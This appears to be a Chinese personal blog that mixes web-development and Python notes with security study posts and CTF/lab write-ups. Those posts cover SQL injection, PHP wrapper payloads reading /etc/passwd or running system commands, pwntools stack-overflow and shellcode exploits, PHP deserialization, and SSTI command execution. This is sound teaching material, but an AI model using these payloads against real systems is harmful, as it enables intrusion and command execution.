Lixiney's Blog

Vulfocus 靶场记录（一）

Lixiney — Tue, 24 Mar 2026 05:56:22 GMT

HMS v1.0 SQL注入(CVE-2022-23366)

注入点在登录页面

poc：

POST /adminlogin.php HTTP/1.1Host: 127.0.0.1:43193Content-Length: 54Cache-Control: max-age=0sec-ch-ua: "Not(A:Brand";v="8", "Chromium";v="144"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Language: zh-CN,zh;q=0.9Origin: http://127.0.0.1:43193Content-Type: application/x-www-form-urlencodedUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://127.0.0.1:43193/adminlogin.phpAccept-Encoding: gzip, deflate, brCookie: PHPSESSID=n30rtma1gnnk63cb900vd524n7; _ga=GA1.1.1607377646.1774331048; _gid=GA1.1.857868182.1774331048; _gat=1; _ga_J1DQF09WZC=GS2.1.s1774331469$o1$g0$t1774331469$j60$l0$h0Connection: keep-aliveloginid=admin' or 1=1 #&password=12345678&submit=Login

前端开发--VUE

Lixiney — Fri, 09 Jan 2026 14:44:11 GMT

vue 安装

使用 webpack

npm install -g @vue/clivue create vue-projectnpm run serve

使用 vite
```
npm create vue@leatestnpm inpm run dev
```

基础语法

创建vue实例

import {createApp} from "vue"import App from "./App.vue"createApp(App).mount("#app")

模板语法

插值
vue 使用 {{ }} 来表示文本插值

{{ message }}

指令
指令是带有 v- 前缀，用于在模板种表达逻辑

v-html 解析html代码

v-bind 动态绑定一个或多个属性

点击

简写：

点击

条件渲染

v-ifv-else-ifv-elsev-show

v-if 与 v-show 的区别

v-if 是真正的条件渲染，因为他会确保在切换过程中条件快内的事件监听器和子组件适当地被销毁和重建
v-if 也是惰性的：如果在初始渲染条件为假，则什么也不做–直到条件第一次变为真时，才会开始渲染条件块
相比之下，v-show 就简单很多–不管初始条件是什么，元素块总是会被渲染，并且只是简单地基于css进行切换。
一般来说，v-if 有更高的切换开销，而 v-show 有更高的初始渲染开销，因此，如果又需要非常频繁地切换，则使用 v-show 较好；如果在运行时条件很少改变，则使用 v-if 较好。

使用template标签

列表渲染

使用 v-for

如果 items 数据中没有索引，可以使用 index

v-for="(item,index) in items" :key="item.index"

事件处理

v-on 可以简写为 @

eg：

事件传参

事件修饰符

前端开发--CSS层叠样式表

Lixiney — Fri, 09 Jan 2026 14:41:41 GMT

字体属性

CSS 字体属性定义字体，加粗，大小，文字样式

color 规定文本的颜色
font-size 设置文本的大小 # chrome浏览器接受的最小字体是12px
font-weight 设置文本的粗细

值	描述
blod	定义粗体字体
bolder	定义更粗的字体
lighter	定义更细的字体
100-900	由细到粗，400等同默认， 700等同bold

font-style 指定文本的字体样式

值	描述
normal	默认值
italic	定义斜体字

font-family 指定一个元素的字体

每个值用都好分开
如果字体名称包含空格，必须加上引号

背景属性

属性	描述
background-color	设置背景颜色
background-image	设置背景图片
background-attachment	设置背景图片是否随着内容滚动还是固定
background-position	设置背景图片显示位置
background-repeat	设置背景图片如何填充
background	复合属性

background-image 属性

元素的背景是元素的总大小，包括填充和边界（不包括外边距）。
默认情况下 background-image 属性放置在元素的左上角，如果图像不够大的话会在垂直和水平方向平铺图像，如果图像大小超过元素大小从图像的左上角显示元素大小的部分

background-repeat 属性

值	说明
repeat	默认值
repeat-x	只向水平方向平铺
repeat-y	只向垂直方向平铺
no-repeat	不平铺

background-size 属性

设置背景图像的大小

值	说明
length	设置背景图片的宽度和高度，第一个值宽度，第二个值高度，如果只是设置一个，第二个值auto
percentage	计算相对位置区域的百分比，第一个值宽度，第二个值高度，如果只是设置一个，第二个值auto
cover	保持图片纵横比并将图片缩放成完全覆盖背景区域的最小大小
contain	保持图片纵横比并将图像缩放成适合背景定位区域的最大大小

background-position 属性

该属性设置背景图像的其实位置，其默认值是 0% 0%

上下左右中， top bottom left right center

x y 单位可以是% 也可以是 px

background-attachment 属性

该属性设置背景图像是否固定或者随页面滚动。简单来说就是一个页面有滚动条的话，滑动滚动条背景是固定的还是随着页面滚动

值	说明
scroll	背景图片随着页面滚动而滚动
fixed	背景图片固定

文本属性

text-align

指定元素文本的水平对齐方式

值	描述
left	文本居左排列，默认值
right	右对齐
center	居中对齐

text-decoration

规定添加到文本的修饰，下划线、上划线、删除线等

值	描述
underline	下划线
overline	上划线
line-through	删除线

text-transform

控制文本的大小写

值	描述
captialize	每个单词开头大写
uppercase	字母全部大写
lowercase	字母全部小写

text-indent

规定文本块中首行文本的缩进

负值是允许的，如果值是复数，将第一行左缩进

列表属性

在 HTML 中有两种类型的列表
有序列表 - 列表项标记有数字或者字母
无序列表 - 列表项标记用特殊的图形如小黑点小方块等

list-style-type

设置列表项标记的类型

值	描述
none	无标记
disc	实心圆
circle	空心圆
square	实心方块
decimal	数字

list-style-image

使用图像来替换列表项的标记

list-style-position

知识如何相对于对象的内容绘制列表

值	描述
inside	列表项标记放置在文本内
outside	列表项标记防止在文本外

list-style

简写属性在一个生命中设置所有的列表属性
可以设置的属性（按顺序）：
list-style-type, list-style-position,list-style-image

表格属性

border

表格边框

border-collapse

设置表格的边框是否被折叠成一个单一的边框或隔开

width 和 height

定义表格的宽度和高度

text-align

设置水平对齐方式，向左，右，或者中心

vertical-align

垂直对齐

如果在表的内容中控制空格之间的边框，应该使用td 和 th 元素的填充属性

其他属性

letter-spacing

调整字符间距

line-height

设置行高

overflow

值	描述
visible	默认值
hidden	超出容器内容被修剪
scroll	内容会被修剪，但是可以滚动查看剩余内容
auto	如果内容被修剪，可以滚动查看剩余内容

white-space

指定元素内的空白怎么处理

值	描述
pre	空白会被浏览器保存
nowrap	文本不会换行

verticle-align

设置一个元素的垂直对齐方式
该属性定义行内元素的基线相对于该元素所在行的基线的垂直对齐

值	描述
text-top	把元素的顶端与父元素字体的顶端对齐
middle	把此元素放置在父元素的中部
text-bottom	把此元素底端与父元素字体的底端对齐

opacity

设置整个元素的透明度，取值 0-1
0 表示完全透明，1 表示不透明

PHP文件包含-伪协议

Lixiney — Thu, 13 Nov 2025 14:36:28 GMT

伪协议	含义
file://	访问本地文件系统
php://	访问各个输入/输出流（I/O streams）
zlib://	压缩流
data://	数据流
glob://	查找匹配的文件路径模式
phar://	php 归档
ssh2://	Secure Shell 2
rar://	RAR
ogg://	音频流

php.ini 参数

allow_url_fopen 默认为 On 允许url里封装协议访问文件
allow_url_include 默认为 Off 不允许包含url 里的封装协议包含文件

各种伪协议的利用方法

file:// 协议

file:///etc/passwd

php://filter

php://filter/read=convert.base64-encode/resource=index.php

php://data 【allow_url_include 设置为 On】

zip:// 协议

zip://test.zip%23phpinfo.txt

data:// 【allow_url_iclude 设置为 On】

data://text/plain, phpinfo();?>

data:text/plain, phpinfo();?>

data://text/plain;base64,PD9waHAgc3lzdGVtKCd3aG9hbWknKTs/Pg==

php://filter 其他过滤器

过滤器	作用
string.rot13	rot13编码
string.toupper	转大写字母
string.tolower	转小写字母
string.strip_tags	去除html标签

例子：

php://filter/read=string.rot13/resource=index.php

PWN 入门基础笔记

Lixiney — Sun, 05 Oct 2025 08:22:17 GMT

环境配置

Python3
pip
gdb-pwndbg 插件
pwntools
IDA
checksec

checksec 安装以及基本环境

使用 apt 安装的最新版的用不习惯，如果安装了pwntools，里面会自带checksec工具

sudo apt install checksec

用法

Arch

程序架构信息，判断该程序是32位还是64位程序，编写exp时选择 p32() 还是 p64()

RELRO

Relocation Read-Only (RELRO) 此项技术主要针对 GOT 改写的攻击方式。它分为两种，Partial RELRO 和 Full RELRO。

Stack

栈溢出保护，如果看到这个选项没有开启则可以尝试栈溢出攻击

NX enabled如果这个保护开启就是意味着栈中数据没有执行权限，如此一来, 当攻击者在堆栈上部署自己的 shellcode 并触发时, 只会直接造成程序的崩溃，但是可以利用rop这种方法绕过

无关而执行文件，该技术是针对代码段落（.text），数据段（.data），未初始化全局变量段（bss）等固定地址的一个防护技术，如果程序开启了PIE保护的话，在每次加载程序时都变换加载地址，不能通过ROPgadget等工具来解题

pwntools 安装以及基本用法

使用 pip 安装 (win)

pip install pwntools

使用 apt 安装 (Linux)

sudo apt install python3-pwntools

用法

导入模块

from pwn import *

打开链接

# 本地连接io = process("文件")# 远程连接io = remote("[ip]",[端口])

从服务器接收数据

#接收一行数据io.revcline()# 全部接收io.recv()# 在读到 test 之前一直读入数据io.recvuntil('test')# 读入 10 位数据io.recv(10)

向服务器发送数据

# 发送一行数据io.sendline()# 如果是32位程序则需要把数据打包成32比特宽度的字节流的形式io.sendline(p32(''))# 如果是64位程序io.sendline(p64(''))

进入交互模式

io.interactive()

栈溢出（Stack Overflow）

一种后进先出的数据结构

栈是计算机内存中的一块特殊区域，用于存储函数调用时的局部变量、函数参数、返回地址等信息。栈遵循后进先出（LIFO）的原则，即最后进入栈的数据最先被取出。

栈是从高地址向低地址延伸的。每个函数的每次调用，都有它自己独立的一个栈帧，这个栈帧中维持着所需要的各种信息。寄存器ebp指向当前的栈帧的底部（高地址），寄存器esp指向当前的栈帧的顶部（低地址）

原理

栈溢出指的是在程序向栈中写入数据时，程序没有限制输入数据的大小，写入的数据量超过了栈的剩余空间，导致数据溢出到相邻的内存区域，覆盖了原本不应被修改的数据，如函数的返回地址，所以攻击者可以构造恶意代码来 getshell

ret2text

Return To Text
这里用 buuctf PWN 方向第二题 rip

信息搜集阶段

拿到程序之后先检查一下程序的位数，看看用 ida64 还是 ida32

checksec 检查一下程序的保护状态，可以看到 Stack 栈溢出保护没有开，所以有很大可能是栈溢出

在 ida 中分析程序

使用 ida64 打开程序

在左侧的栏内找到 main 函数，双击之后按 Tab 键可以查看反编译后的伪代码

可以看到有一个 gets 函数，基本上确定是栈溢出攻击了。
双击变量 s 查看栈帧，可以推断出来需要填充的垃圾数据的长度 0xF + ebp [如果是 64 位程序就是 8，如果是32位程序就是 4]

确定垃圾字符的长度

在上一步操作中已经推断出来了，但是还有另外几种方法，在此记录一下，具体以 gdb 调试的结果为准

使用 堆栈指针 ，在 选项 - 常规 中勾选 堆栈指针

可以确定长度为 0x18

使用 pwngdb 调试
1. gdb + 文件名 进入gdb调试界面
2. starti 执行 disass main 查看 main 函数的反汇编代码，b *[16进制地址] 在输入数据的地方打断点
3. run 运行程序 n 输入输入 AAAAAAA ，在 0x7fffffffdd61 处输入，在 0x7fffffffdd78 之后跳出
1. p/d 地址1-地址2 计算一下要填充垃圾字符的位数，得到长度为 23 是个不是 8 的倍数，同时又是一个64位的程序，所以要考虑 堆栈平衡 的问题
使用 msf 自带的命令生成垃圾字符
1. msf-pattern_create -l 400 生成一段长度为 400 的垃圾字符
1. 依旧是进入 pwngdb 调试，打完断点之后在输入数据的地方将这个长度为 400 的字符串传进去，寻找 RBP
1. RBP 只能截取到 a6Aa 说明被撑爆了，只需要看看 a6Aa 这个字符串在刚刚生成的字符串的位置即可
2. msf-pattern_offset -q a6Aa 算出来19 再加上 a6Aa 本身的长度4 ，就是 23

找到可以利用的shell函数地址

在 IDA 中按 SHIFT + F12 可以查看可打印字符

双击之后按CTRL + X 交叉引用一下，拿到地址为0x40118A

编写 EXP

from pwn import *io = remote("node5.buuoj.cn",29582)addr = 0x40118Apayload = b'a'*23 + p64(addr+1) # 堆栈平衡，所以这里要 +1io.sendline(payload)io.interactive()

ret2shellcode

同样是栈溢出，但是程序中没有可以利用的后门函数，这个时候就需要生成shellcode

原理

攻击者需要将 shellcode （shell 的机器码）注入到内存当中，随后lion给栈溢出复写 return_address，使程序跳转至 shellcode 所在的内存地址

注意：需要在 ASLR 保护机制没有开启的情况下才能利用成功

ASLR 保护机制

地址随机化

开启之后，每次程序加载是 stack、libaries、heap的基址都会随机化。

三种状态

随机化关闭

echo 0 > /proc/sys/kernel/randomize_va_space

EXP

生成shellcode

shell_code = asm(shellcraft.sh())

完整exp 案例

from pwn import *io = remote("node5.buuoj.cn",27627)buf_addr = 0x233000offset = 56shell_code = asm(shellcraft.sh())payload = b'a'*56 + p64(buf_addr)io.sendline(shell_code)io.recvline()io.sendline(payload)io.interactive()print(payload)

ROP

32位 ROP 链构造

payload 格式

payload = b'a' * [垃圾数据长度] + p32(_system 地址) + p32(0) + p32(/bin/sh 地址)

64位 ROP 链构造

payload 格式

payload = b'a' * [垃圾数据长度] + p64(rdi) + p64(/bin/sh 地址) + p64(_system 地址)

PHP反序列化-WriteUp

Lixiney — Sat, 13 Sep 2025 14:12:37 GMT

注意事项：阅读之前先要学会 php 的基础语法，面向对象的一些基础知识

什么是序列化和反序列化

序列化是将对象转换成可存储的字节序列的过程
反序列化是将字节序列恢复为对象

一个简单的实例

序列化 serialize 函数

     class a{    var $name = "Lixiney";    // 内部变量    var $age = "18";         // 内部变量    }$a = new a();       // new 一个对象echo serialize($a);          // 输出 序列化的字符串?>

反序列化 unserialize 函数

 $str = 'O:1:"a":2:{s:4:"name";s:7:"Lixiney";s:3:"age";s:2:"18";}';  //上一步操作中的序列化后的字符串$a = unserialize($str);  // 反序列化echo var_dump($a); // var_dump() 查看变量类型?>

什么是反序列化漏洞

序列化和反序列化本身没有什么问题，但是当用户参数可控，而且后台错误的使用了一些危险函数的时候，就会出现安全问题

一些魔法函数

__construct()            //类的构造函数，创建对象时触发__destruct()             //类的析构函数，对象被销毁时触发__call()                 //在对象上下文中调用不可访问的方法时触发__callStatic()           //在静态上下文中调用不可访问的方法时触发__get()                  //读取不可访问属性的值时，这里的不可访问包含私有属性或未定义__set()                  //在给不可访问属性赋值时触发__isset()                //当对不可访问属性调用 isset() 或 empty() 时触发__unset()                //在不可访问的属性上使用unset()时触发__invoke()               //当尝试以调用函数的方式调用一个对象时触发__sleep()                //执行serialize()时，先会调用这个方法__wakeup()               //执行unserialize()时，先会调用这个方法__toString()             //当反序列化后的对象被输出在模板中的时候（转换成字符串的时候）自动调用

接下来我们来逐行解析一下赛题的代码

highlight_file(__FILE__);error_reporting(0);class a{    var $act;    function action(){        eval($this->act);  // eval函数会将字符串当成php代码执行    }}$a=unserialize($_GET['flag']);    //从get方式传入一个数据$a->action();   // 执行了 action 函数?>

首先是这个是用来表示php语言的，php 脚本以 开始，以 ?> 结束

highlight_file() 函数用来高亮显示代码

error_reporting(0) 表示清空本页的报错信息

eval 函数可以将字符串当作php代码执行

例如：

$str = "phpinfo();";eval($str);?>

既然 php 代码可以执行，那我们就可以执行一些危险的命令，如下

 $str = "system('calc');";   // 执行系统命令 calc 是打开计算器eval($str);?>

根据这个原理就可以拿到 flag.php 中的内容

下面这个代码用来生成 payload

 class a{    var $act;    function action(){        eval($this->act);    }}$a = new a();$a -> act = "highlight_file('flag.php');"; echo serialize($a);?>

根据前文所写的高亮显示代码的函数可以查看 flag.php 中的内容

O:1:"a":1:{s:3:"act";s:27:"highlight_file('flag.php');";}

提交到 ?flag 拿到flag


JSONP 漏洞
Lixiney — Tue, 02 Sep 2025 13:04:38 GMT
Jsonp 原理
jsonp 可以让网页从别的域获取内容，即跨域读取数据
攻击者模拟用户向有漏洞的服务器发送 jsonp 请求，然后获取到了用户的某些信息，再将这些信息发送到攻击者可控的服务。

jsonp 最基本的原理就是，动态添加一个

XMLHttpRequest 对象

所有现代浏览器均支持 XMLHttpRequest 对象

XMLHttpRequest 用于在后台与服务器进行数据交换

创建 XMLHttpRequest 对象

var xmlhttp = new XMLHttpRequest();

Ajax 向服务器发出请求

xmlhttp.open('GET','test.php',true);xmlhttp.send();

方法

open(method,url,async)
- method：请求的类型 GET 或 POST
- url ：文件在服务器上的位置
- async：true（异步）或 false （同步）
send(string)
- string 仅用于 POST 请求

GET 请求

xmlhttp.open("GET","test.php?id=1",true);xmlhttp.send();

POST 请求

xmlhttp.open("POST","test.php",true);xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");xmlhttp.send("name=lixiney&password=hello");

setRequestHeader(header,value)
- header 请求头
- 请求头的值

Async=true

当 async = true 时

<script>function loadXMLDoc(){        var xmlhttp = new XMLHttpRequest();        xmlhttp.onreadystatechange = function(){            if(xmlhttp.readyState == 4 && xmlhttp.status == 200){                document.getElementById("myDiv").innerHTML=xmlhttp.responseText;            }        }        xmlhttp.open("GET","test.php",true);        xmlhttp.send();    }script>

Ajax 服务器的响应

服务器响应

responseText
- 获得字符串形式的响应数据
responseXML
- 获得XML形式的响应数据

Ajax - onreadystatechange 事件

当请求被发送到服务器时，我们需要执行基于响应的任务。

每当 readyState 改变时，就会出发 onreadystatechange 事件。

readyState 属性存有 XMLHttpRequest 的状态信息
- 0 : 请求未初始化
- 1：服务器连接已建立
- 2：请求已接收
- 3：请求处理中
- 4：请求已完成，且响应就绪
status
- 200 : OK
- 404：未找到页面
- 其他状态码： https://www.runoob.com/http/http-status-codes.html

Ajax - Json

<script>    function putJson(){        var xmlhttp = new XMLHttpRequest();        xmlhttp.onreadystatechange = function(){        if(xmlhttp.status == 200 && xmlhttp.readyState ==4){            var myArr = JSON.parse(this.responseText);                myFunc(myArr);           }        }        xmlhttp.open("GET","test.json",true);        xmlhttp.setRequestHeader("Content-type","application/json;charset=utf-8");        xmlhttp.send();    }    function myFunc(arr){var out = "";        var i;        for(i=0;ilength;i++){out += 'a< href="'+arr[i].url+'">'+arr[i].title+'
';        }        document.getElementById('myDiv').innerHTML=out;    }script>

test.json

[  {    "title": "JavaScript 教程",    "url": "https://www.runoob.com/js/"  },  {    "title": "HTML 教程",    "url": "https://www.runoob.com/html/"  },  {    "title": "CSS 教程",    "url": "https://www.runoob.com/css/"  }]

SSTI模板注入漏洞

Lixiney — Tue, 08 Jul 2025 14:15:11 GMT

ssti漏洞的成因与危害

当服务端接受了用户的恶意代码，未经任何处理就将其应用在web应用模板的部分上，服务端在渲染这些模板时，执行了这些恶意代码，可能导致getshell 代码执行敏感信息泄露等安全问题

一个简单的漏洞代码实例

from flask import Flask,render_template_string,requestapp = Flask(__name__)@app.route('/')def index():    name = request.args.get("name")    str = f"Hello {name}"    return render_template_string(str,name=name)if __name__ == '__main__':    app.run(debug=True)

使用 {{1-2}} 测试，发现代码被执行

注意！

这里的运算符号不能是 + 号，因为在url编码中+号做为空格使用

漏洞利用

从一个字符串或者列表对象中获取其类

''.__class__

获取基类，使用这个类

''.__class__.__bases__

''.__class__.__mro__

''.__class__.__base__

这里要使用这个类可以使用下标表示

''.__class__.__mro__[1]

获取 object 类下面的所有子类

''.__class__.__base__.__subclasses__()

获取到之后选择合适的类，这里可以使用这个类

比如在列表的第117行，可以这样写

''.__class__.__base__.__subclasses__()[117]

初始化类，获取全局方法，变量以及参数

''.__class__.__base__.__subclasses__()[117].__init__.__globals__

代码执行

使用 popen() + read() 方法可以返回执行后的结果

''.__class__.__base__.__subclasses__()[117].__init__.__globals__['popen']('whoami').read()

其他引用

{{config.__class__.__init__.__globals__['os'].popen('whoami').read()}}

{{urlfor.__class__.__globals__['os'].popen('calc')}}

{{lipsum.__globals__['os'].popen('calc')}}

{{get_flashed_messages.__globals__['os'].popen('whoami').read()}}

waf绕过

双重花括号拦截绕过

{%print(''.__class__)%}

request方法绕过

request.args.key  #获取get传入的key的值request.form.key  #获取post传入参数(Content-Type:applicaation/x-www-form-urlencoded或multipart/form-data)reguest.values.key  #获取所有参数，如果get和post有同一个参数，post的参数会覆盖getrequest.cookies.key  #获取cookies传入参数request.headers.key  #获取请求头请求参数request.data  #获取post传入参数(Content-Type:a/b)request.json  #获取post传入json参数 (Content-Type: application/json)

PHP代码审计-反序列化漏洞

Lixiney — Tue, 08 Jul 2025 13:38:45 GMT

所有的 flag 均在 flag.php 的 $flag 变量中

level 1

highlight_file(__FILE__);class a{    var $act;    function action(){        eval($this->act);    }}$a=unserialize($_GET['flag']);$a->action();?>

eval函数为代码执行函数，将字符串作为php代码执行，已知 flag 在 flag.php 文件中，先将 flag.php 文件包含进来，再对 flag 变量进行输出

exp:

highlight_file(__FILE__);class a{    var $act;    function action(){        eval($this->act);    }}$test = new a;$test->act = 'include("flag.php");echo $flag;';echo serialize($test)

生成的payload：

O:1:”a”:1:{s:3:”act”;s:31:”include(“flag.php”);echo $flag;”;}

level 2

highlight_file(__FILE__);include("flag.php");class mylogin{    var $user;    var $pass;    function __construct($user,$pass){        $this->user=$user;        $this->pass=$pass;    }    function login(){        if ($this->user=="daydream" and $this->pass=="ok"){            return 1;        }    }}$a=unserialize($_GET['param']);if($a->login()){    echo $flag;}?>

__construct 初始化方法

exp:

highlight_file(__FILE__);include("flag.php");class mylogin{    var $user;    var $pass;    function __construct($user,$pass){        $this->user=$user;        $this->pass=$pass;    }    function login(){        if ($this->user=="daydream" and $this->pass=="ok"){            return 1;        }    }}$test = new mylogin("daydream","ok");echo serialize($test);?>

payload:

O:7:”mylogin”:2:{s:4:”user”;s:8:”daydream”;s:4:”pass”;s:2:”ok”;}

level 3

highlight_file(__FILE__);include("flag.php");class mylogin{    var $user;    var $pass;    function __construct($user,$pass){        $this->user=$user;        $this->pass=$pass;    }    function login(){        if ($this->user=="daydream" and $this->pass=="ok"){            return 1;        }    }}$a=unserialize($_COOKIE['param']);if($a->login()){    echo $flag;}?>

与 level 2 相似注意超全局变量 $_COOKIE ，通过cookie 传参传入 payload ，同时进行一下url编码

payload：

O%3a7%3a%22mylogin%22%3a2%3a%7bs%3a4%3a%22user%22%3bs%3a8%3a%22daydream%22%3bs%3a4%3a%22pass%22%3bs%3a2%3a%22ok%22%3b%7d

未完待续。。。

vulfocus|命令执行漏洞WP

Lixiney — Sun, 06 Jul 2025 05:10:16 GMT

1.运行环境

进入首页返回 index.php?cmd=ls /tmp

2.将其拼接到浏览器 url 栏后面

发现输出了一段文字，但是看的不是很明显，CTRL+U 查看页面源代码

发现有两行东西，这就说明这个目录下面就一个index.php 文件

推测执行了 ls 系统命令

3.替换其他指令查找 flag

执行下列命令

find / -name '*flag*'

获得flag

flag-{bmh8bd27630-a4fd-4bfa-a7c8-61af1a1f0f0b}

Python-Django开发

Lixiney — Tue, 01 Jul 2025 03:52:06 GMT

创建虚拟环境

创建 env 环境

python -m venv env

启动虚拟环境

./env/Scripts/activate

运行第一个 Django 程序

安装 django 库

pip install django

初始化 django 项目

django-admin startproject website

启动 django 项目

python ./website/manage.py runserver

切换端口号

python manage.py runserver 8888

修改首页并输出 Hello world

# views.pyfrom django.http import HttpResponsedef index(request):  return HttpResponse("Hello world")

修改 urls.py 文件

#urls.pyfrom django.contrib import adminfrom django.urls import pathfrom . import views   #导入 views.py urlpatterns = [    path('admin/', admin.site.urls),    path('',views.index,name="asd"), ]

django-admin 命令详解

查看 django-admin 提供的所有命令

django-admin help

创建新项目

django-admin startproject

在当前目录下创建一个新的django项目，包括最基本的目录

项目名称 /: 项目主目录
- __init__ .py
- settings.py 配置文件
- urls.py : URL路由配置
- wsgi.py ：WSGI 应用入口

创建新应用

django-admin startapp 应用名称

创建一个新的 django 应用，包含：

migrations/：数据库迁移文件目录
_init_.py
admin.py：管理后台配置
apps.py：应用配置
models.py：数据库模型定义
tests.py：测试代码
views.py：试图函数

检查项目配置

django-admin check

这个命令会检查 django 项目是否有配置错误，包括：

模型定义是否正确
url 配置是否有效
模板设置是否正确
静态文件配置等

数据库迁移

django 使用迁移系统来管理数据库模式变更

django-admin makemigrations # 创建迁移文件django-admin migrate        # 应用迁移到数据库

创建超级用户

引导用户创建一个可以访问django 管理后台的超级用户

django-admin createsuperuser

django-admin 常用命令

命令	描述
startproject	创建一个新的django项目
startapp	创建一个新的django应用
runserver	启动开发服务器
makemigrations	生成数据库迁移文件
migrate	执行数据库迁移
shell	启动 django 交互式shell
collectstatic	收集静态文件（用于生产环境）
test	运行单元测试

Python创建env虚拟环境

Lixiney — Tue, 01 Jul 2025 03:40:47 GMT

创建虚拟环境

python -m venv env

启动虚拟环境

./env/scripts/activate

Python-PyMySQL

Lixiney — Sun, 29 Jun 2025 07:06:34 GMT

安装 PyMySQL

pip install PyMySQL

操作数据库

开启 mysql 地址为 localhost:3306 用户名为 root 密码为 root

创建数据库连接

import pymysqldbconn = pymysql.connect(  host='localhost',  user='root',  password='root',  database='test')

使用 cursor() 方法创建一个游标对象 cursor

cursor = dbconn.cursor()

使用 excute() 方法执行sql查询

cursor.excute("select user()")

使用 fetchone() 方法获取一条数据

str = cursor.fetchone()

关闭数据库连接

dbconn.close()

创建数据表

#!/usr/bin/python3 import pymysql # 打开数据库连接db = pymysql.connect(host='localhost',                     user='testuser',                     password='test123',                     database='TESTDB') # 使用 cursor() 方法创建一个游标对象 cursorcursor = db.cursor() # 使用 execute() 方法执行 SQL，如果表存在则删除cursor.execute("DROP TABLE IF EXISTS EMPLOYEE") # 使用预处理语句创建表sql = """CREATE TABLE EMPLOYEE (         FIRST_NAME  CHAR(20) NOT NULL,         LAST_NAME  CHAR(20),         AGE INT,           SEX CHAR(1),         INCOME FLOAT )""" cursor.execute(sql) # 关闭数据库连接db.close()

使用预处理方法防止SQL注入

#!/usr/bin/python3 import pymysql # 打开数据库连接db = pymysql.connect(host='localhost',                     user='testuser',                     password='test123',                     database='TESTDB') # 使用 cursor() 方法创建一个游标对象 cursorcursor = db.cursor() sql = 'SELECT * FROM user where username = %s' cursor.execute(sql,(username,))# 关闭数据库连接db.close()

Python-列表、元组、字典、集合

Lixiney — Sun, 29 Jun 2025 04:38:57 GMT

数据结构

序列类型：列表、元组、字符串
映射类型：字典
集合类型：集合、冻结集合

列表 (List)

列表是Python中最灵活的有序的集合类型

列表的基本特性

有序的集合，元素按照插入的顺序排列
可变，可以修改内容
可以包含任意类型的对象 , 可以嵌套使用
使用方括号[]，元素之间用逗号分隔

eg :

list = [123,'test',1.2,1e10,[1,2,3]]

底层实现

列表实际上是一个动态数组，而不是链表
列表在内存中分配的空间通常比实际需要的多，这是为了优化追加的操作
平均世间复杂度为o(1)
列表元素在内存中不连续存储，列表只存储指向各个元素的指针

创建列表

普通方式

list = []for i in range(10):list.append(i)

推导式

list = [i for i in range(10)]##带有条件的情况list = [i for i in range(10) if i % 2 == 0]

列表的输出

与字符串的索引一样，列表索引从0开始，第二个索引为1，最后一个元素的索引也可以是-1

直接输出

list = [1,2,3,4,5,6]print(list)

访问列表中的值

list = [1,2,3,4,5,6]print(list[1])

截取字符串

list = [1,2,3,4,5,6]print(list[1:3])

更新列表

使用 append() 方法

eg：

list = [1,2,3,4,5,6]list.append(7)print(list)

删除列表元素

使用del语句
使用 remove() 方法
使用 pop() 方法

list = [1,2,3,4,5,6]list.pop(1)del list[1]list.remove(1)print(list)

列表脚本操作符

表达式	描述
len([1,2,3])	长度
[1,2,3]+[4,5,6]	组合
[1]*4	重复
3 in [1,2,3]	元素是否存在列表中
for x in [1,2,3]:print(x,end=” “)	迭代

列表常用函数&方法

python 包含一下函数

函数	描述
len()	列表元素个数
max()	返回最大值
min()	返回最小值
list(seq)	将元组转换为列表

python 包含以下方法

方法	描述
list.append()	在列表末尾追加新的对象
list.count()	统计某个元素在列表中出现的次数
list.extend()	在列表末尾一次性追加另一个序列中的多个值
list.index()	从列表中找出某个值第一个匹配项的索引位置
list.insert(index, obj)	将对象插入列表
list.pop()	移除列表中第一个元素（默认最后一个元素），并且返回该元素的值
list.remove()	移除列表中某个值的第一个匹配项
list.reverse()	反向列表中的元素
list.sort(key=None,reverse=False)	对列表进行排序
list.clear()	清空列表
list.copy()	复制

元组（Tuple）

元组与列表类似，不同之处在于元组的元素不能修改
元组使用 () 小括号，列表使用方括号 []
元组创建很简单，只需要在括号中添加元素，并使用逗号隔开

eg：

tup1 = ("Google","baidu","github","bing")

创建空元组

tup1 = ()

注意：当元组中只包含一个元素时，需要在元素后面加逗号. 否则括号会被当做运算符使用

访问元组

和列表一样，元组可以使用下标索引来访问元组中的值

eg：

tup1 = ("Google","baidu","github","bing")print ("tup1[0]: ", tup1[0])

修改元组

元组中的元素是不允许被修改的，但是可以对元组进行连接组合

eg：

tup1 = (1,2,3)tup2 = (4,5)#tup1[0]=0  这种操作是非法的tup3 = tup1 + tup2

删除元组

元组中的元素值不允许被删除，但是可以使用del 语句来删除整个元组

eg：

tup1 = ("Google","baidu","github","bing")del tup1

元组的运算

与字符串一样，元组之间可以使用 +、+=、*号进行运算

eg：复制

tup1 = ("asd",)*4

元组的内置函数

基本和列表相同，不再赘述

计算个数、最大值、最小值

方法	描述
tuple(iterable)	将可迭代系列转换为元组

字典（Dict）

字典是另一种可变容器模型，且可存储任意类型对象
字典的每个键值 key=>value 用冒号:分割，每个对之间用逗号分隔，整个字典包括在花括号中

d = {key1 : value1, key2 : value2, key3 : value3 }

注意：dict作为python的关键字和内置函数，变量名不建议命名为dict

键必须是唯一的，但值不必

值可以取任何数据类型，但键必须是不可变的，如字符串，数字

tinydict = {'name': 'runoob', 'likes': 123, 'url': 'www.runoob.com'}

创建空字典

使用花括号 {} 创建空字典

emptyDict = {}

使用内置函数 dict() 创建空字典

emptyDict = dict()

访问字典中的值

tinydict = {'Name': 'Runoob', 'Age': 7, 'Class': 'First'} print ("tinydict['Name']: ", tinydict['Name'])print ("tinydict['Age']: ", tinydict['Age'])

修改字典

tinydict = {'Name': 'Runoob', 'Age': 7, 'Class': 'First'} tinydict['Age'] = 8               # 更新 Agetinydict['School'] = "菜鸟教程"  # 添加信息

删除字典中的元素

使用del 语句删除字典

# 删除键‘Name’del qweDict['Name']# 删除整个字典del qweDict

del 删除后整个字典不再存在

清空字典

qweDict.clear()

字典键的特性

不允许同一个键出现两次，创建时同一个键如果被赋值两次，后一个值会被记住
键必须不可变，所以可以用数字，字符串或元组充当，而列表就不行

字典内置函数&方法

